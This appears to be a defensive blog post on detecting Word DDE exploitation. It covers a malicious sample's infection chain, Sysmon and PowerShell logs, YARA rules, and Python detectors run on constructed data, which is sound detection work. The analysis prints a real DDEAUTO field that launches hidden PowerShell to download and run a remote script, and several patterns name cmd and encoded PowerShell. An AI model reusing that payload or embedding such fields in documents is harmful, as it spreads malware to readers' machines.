DDE Exploitation Detection



So the DDE vulnerability/feature (open to debate) is hot, and it is being used not only by high-profile APT actors like FIN7, but also by several other threat actors, such as cyber criminals infecting machines with Locky or Hancitor.

Let's see how we can detect the malicious files, as well as the typical infection process that uses the DDE feature.

So here is a Word doc file which looks empty, but there are two hidden objects.
MD5: f5564925dd68e23672d898e0a590340e

The first thing I come across is this prompt, which I should answer “No” to.



So I go ahead and click “No”, and I see a Word file without any text.

The trick is to press Ctrl+A to select everything in the Word file; I can then see two invisible boxes selected.


The first box is nothing, maybe a decoy. The second, smaller box is the “Field” element, which contains the formula to be updated. What is that formula? Let us have a look at it:

I select it, right-click and choose “Toggle Field Codes”, and ta-da! I can see some code, which would have been executed if I had said “Yes” initially.


A simple command to run PowerShell, to download a malicious PS script and execute it.

Let us have a quick look at this script:


I copy the above into Notepad and, as expected, this is base64-encoded text which decodes to a PowerShell script.


The script looks like this:


Download Domains:



MD5: a633ccbf2a9d299a06512319a0286777

It seems that different analysis engines identify this sample as either Emotet, Locky or NeutrinoPoS.


History

Creation Time: 2017-10-19 10:38:56
First Submission: 2017-10-19 19:27:46
Last Submission: 2017-10-21 01:24:10
Last Analysis: 2017-10-21 01:24:10


From hybrid-analysis: it seems to be an injector, which spawns msiexec.exe and injects into it.



So we know how the initial infection stages occur. Let us open the malicious Word file, follow along to create logs, and see what we can find using Sysmon and enhanced PS logging:




The malicious file dropped in the temp folder: "12.exe"




Winword.exe spawning cmd.exe, with the parameters passed to cmd.exe:


cmd.exe spawning powershell.exe




Network communication to download the next powershell script string:



Next we can see PowerShell spawning powershell.exe with the -e switch (short for -EncodedCommand) and the base64-encoded PS script:


Powershell.exe creating an exe in the appdata/local/temp folder:




powershell.exe spawning the 12.exe (executable) from appdata/local/temp folder:



Enhanced PS logging also shows us the deobfuscated PS executing:
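The process chain above (Word spawning cmd.exe, cmd.exe spawning PowerShell, PowerShell spawning a second PowerShell with -e, and an executable started from AppData\Local\Temp) is exactly what a detection over Sysmon Event ID 1 data keys on. The following Python is an added example, not code from the original post or from any tool it mentions. It runs three checks over a constructed set of Sysmon-style records (every GUID, path, user name and the encoded payload is invented; only the shape of the chain is the post's), reconstructing the parent chain through ProcessGuid/ParentProcessGuid and decoding any -e/-EncodedCommand argument so the analyst sees the script text, much as the enhanced PS logging did.

```python
import base64
import binascii
import ntpath

# Constructed Sysmon-style process-creation records (Event ID 1 fields),
# modelled on the chain the post walks through: WINWORD.EXE -> cmd.exe ->
# powershell.exe -> powershell.exe -e <base64> -> 12.exe run from
# AppData\Local\Temp. Every GUID, path, user name and the encoded payload
# is made up for this example; only the shape of the chain is the post's.
PAYLOAD_TEXT = "Write-Output 'constructed second-stage script'"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode()
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE1 = ("powershell -NoP -W Hidden -c \"$e=(New-Object Net.WebClient)"
          ".DownloadString('http://example.invalid/s');powershell -e $e\"")
SAMPLE_EVENTS = [
    {"ProcessGuid": "{g-1}", "ParentProcessGuid": "{g-0}",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n invoice.docx'},
    {"ProcessGuid": "{g-2}", "ParentProcessGuid": "{g-1}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c " + STAGE1},
    {"ProcessGuid": "{g-3}", "ParentProcessGuid": "{g-2}",
     "Image": PS_EXE, "CommandLine": STAGE1},
    {"ProcessGuid": "{g-4}", "ParentProcessGuid": "{g-3}",
     "Image": PS_EXE, "CommandLine": f"{PS_EXE} -e {ENCODED_PAYLOAD}"},
    {"ProcessGuid": "{g-5}", "ParentProcessGuid": "{g-4}",
     "Image": r"C:\Users\victim\AppData\Local\Temp\12.exe",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\12.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and also -ec.
ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}


def _name(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a -e/-enc/-EncodedCommand switch, else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] in "-/" and flag[1:].lower() in ENC_FLAGS:
            try:
                return base64.b64decode(value.strip("\"'"), validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                continue  # e.g. "-e $e": the argument is a variable, not base64
    return None


def _lineage(event, by_guid):
    """Image names from the process itself up to the oldest ancestor we have a record for."""
    chain, cur, seen = [], event, set()
    while cur is not None and cur["ProcessGuid"] not in seen:
        seen.add(cur["ProcessGuid"])
        chain.append(_name(cur["Image"]))
        cur = by_guid.get(cur["ParentProcessGuid"])
    return chain


def detect(events):
    """Apply the three chain-based checks and return one alert dict per hit."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        chain = _lineage(e, by_guid)
        me, ancestors = chain[0], chain[1:]
        under_office = any(a in OFFICE_APPS for a in ancestors)
        lineage = " <- ".join(chain)
        if me in SHELLS and under_office:
            alerts.append({"rule": "office_spawns_shell", "lineage": lineage,
                           "detail": e["CommandLine"]})
        if me in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(e["CommandLine"])
            if decoded is not None:
                alerts.append({"rule": "encoded_powershell", "lineage": lineage,
                               "detail": decoded})
        if "\\appdata\\local\\temp\\" in e["Image"].lower() and under_office:
            alerts.append({"rule": "temp_exe_under_office", "lineage": lineage,
                           "detail": e["Image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['lineage']}\n    {alert['detail']}")
```

Walking the lineage rather than only checking the immediate parent is what catches the second PowerShell and 12.exe: neither has an Office parent, but both sit under WINWORD.EXE in the tree.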





Detecting using YARA rules

Some great references:



For DOCX files, since a .docx is a compressed (zip) file, I had to decompress it, navigate into the “word” folder and then run grep to identify the strings inside the files. I looked for the strings “DDE”, “powershell” and “webclient” (the first grep -v drops the many lines containing “hidden”, since that word itself contains “dde” and would otherwise match):
cat document.xml | xxd | grep -i -v "hidden\|dden\|hidde" | grep -i "DDE\|powershell\|webclient" -B5 -A5

Found this in the document.xml file:


Let us create a yara rule:

rule dde_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}
rule ddeauto_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}



But this works on the uncompressed document.xml, not on the actual .docx file. So let us use the tool zipdump.py (courtesy of Didier Stevens) along with yara to detect within the compressed file:



Printing the matched raw strings (the yarastringsraw option) to standard output:


I tested this yara rule on various malicious samples deploying the DDE technique:


Out of 13 samples, 3 went undetected.


When I tried the regex on the contents of the document.xml file:

The sample 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987.bin is missing cmd.exe; instead it uses directory traversal to execute powershell directly.


The field object is hiding behind this image, in font size 1 and invisible, so it was tricky to detect:





I click “Yes” to let the DDE command execute, to see if this really works. And it does!


The other sample looked like this:


The following was hiding behind the McAfee Secure image:

DDEAUTO"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://netdocuments(dot)jacksonkelly.co/pl.ps1'); powershell -e $e # " "issued by Jackson Kelly PLLC"  \* MERGEFORMAT


So I modified my yara rules as follows and was able to detect these as well:

faisal@siftworkstation:~$ cat dde_docx.yara
rule dde_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}
rule ddeauto_docx
{
        strings:
           $s2 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s2
}

rule ddeauto_msword
{
        strings:
           $s3 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[Mm][Ss][Ww][oO][Rr][Dd][.][Ee][Xx][Ee]/

        condition:
           $s3
}

rule dde_msword
{
        strings:
           $s4 = /[Dd][Dd][Ee].+?[Mm][Ss][Ww][oO][Rr][Dd][.][Ee][Xx][Ee]/

        condition:
           $s4
}
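The yara regexes above match on the raw document.xml bytes, and the grep earlier in the post does the same over a hex dump. An alternative, added here as an example (Python; it is neither the post's code nor Didier Stevens' zipdump.py), is to parse the WordprocessingML field structure instead: reassemble each field instruction from its instrText runs and fldSimple attributes in every XML part under word/ (headers, footers and footnotes included, not only document.xml), then apply the same DDE/DDEAUTO plus cmd/powershell/MSWord.exe-traversal logic as the four rules. The .docx containers, field contents and commands below are constructed and harmless; the minimal container omits [Content_Types].xml and the relationship parts, which the scanner does not need.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Same intent as the post's four yara rules: a DDE or DDEAUTO field whose
# instruction names cmd, powershell, MSWord.exe or a ..\ traversal path.
DDE_RE = re.compile(r"^\s*(DDEAUTO|DDE)\b", re.I)
PAYLOAD_RE = re.compile(r"cmd(\.exe)?|powershell|msword\.exe|\.\.\\", re.I)


def field_instructions(xml_bytes):
    """Reassemble every field instruction in one WordprocessingML part.

    A complex field is fldChar begin ... end with its instruction spread over any
    number of w:instrText runs (Word splits them freely); a simple field carries
    the instruction in its w:instr attribute. Nested fields are handled by a stack.
    """
    root = ET.fromstring(xml_bytes)
    fields, stack = [], []
    for el in root.iter():  # document order
        if el.tag == W + "fldSimple":
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                fields.append("".join(stack.pop()))
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
    return fields


def scan_docx(data):
    """Return one finding per DDE/DDEAUTO field in any XML part under word/."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                instructions = field_instructions(zf.read(name))
            except ET.ParseError:
                continue  # a malformed part is not a reason to stop scanning the rest
            for instr in instructions:
                m = DDE_RE.match(instr)
                if m:
                    findings.append({"part": name, "field": m.group(1).upper(),
                                     "spawns_shell": bool(PAYLOAD_RE.search(instr)),
                                     "instruction": instr.strip()})
    return findings


# --- constructed test documents (not real samples) ---------------------------
NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'


def document_xml(body):
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<w:document {NS}><w:body>{body}</w:body></w:document>')


def complex_field(*instr_runs):
    """A complex field with its instruction split across several runs, as Word writes it."""
    runs = "".join(f'<w:r><w:instrText xml:space="preserve">{escape(t)}</w:instrText></w:r>'
                   for t in instr_runs)
    return ('<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>x</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')


def build_docx(doc_xml):
    """Minimal .docx container holding only word/document.xml (enough for the scanner)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", doc_xml)
    return buf.getvalue()


# DDE via cmd.exe, split over three runs; the "hidden" text run is the kind of
# line the post's grep -v filter had to throw away.
DOC_CMD = document_xml(
    '<w:p><w:r><w:t>hidden text that a grep for DDE would trip over</w:t></w:r></w:p>'
    + complex_field(" DDE ", r"c:\\windows\\system32\\cmd.exe ",
                    '"/k powershell -c Write-Output constructed" '))
# DDEAUTO with the MSWord.exe\..\.. traversal shape from the post's second sample.
DOC_TRAVERSAL = document_xml(complex_field(
    r'DDEAUTO"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows'
    r'\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -W Hidden Write-Output constructed"',
    r' "constructed lure text"  \* MERGEFORMAT'))
# Ordinary DATE and PAGE fields: must not alert.
DOC_BENIGN = document_xml(
    '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">'
    '<w:r><w:t>1 January 2017</w:t></w:r></w:fldSimple></w:p>' + complex_field(" PAGE "))

if __name__ == "__main__":
    for label, doc in (("cmd", DOC_CMD), ("traversal", DOC_TRAVERSAL), ("benign", DOC_BENIGN)):
        print(label, scan_docx(build_docx(doc)))
```

Because the instruction is rebuilt from the parsed runs, the rule text is short and case-insensitive (no [Dd][Dd][Ee] spelling), the "hidden" false positive never arises, and a field that is hidden behind an image or set to font size 1 is found just the same, since the scanner never looks at formatting.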

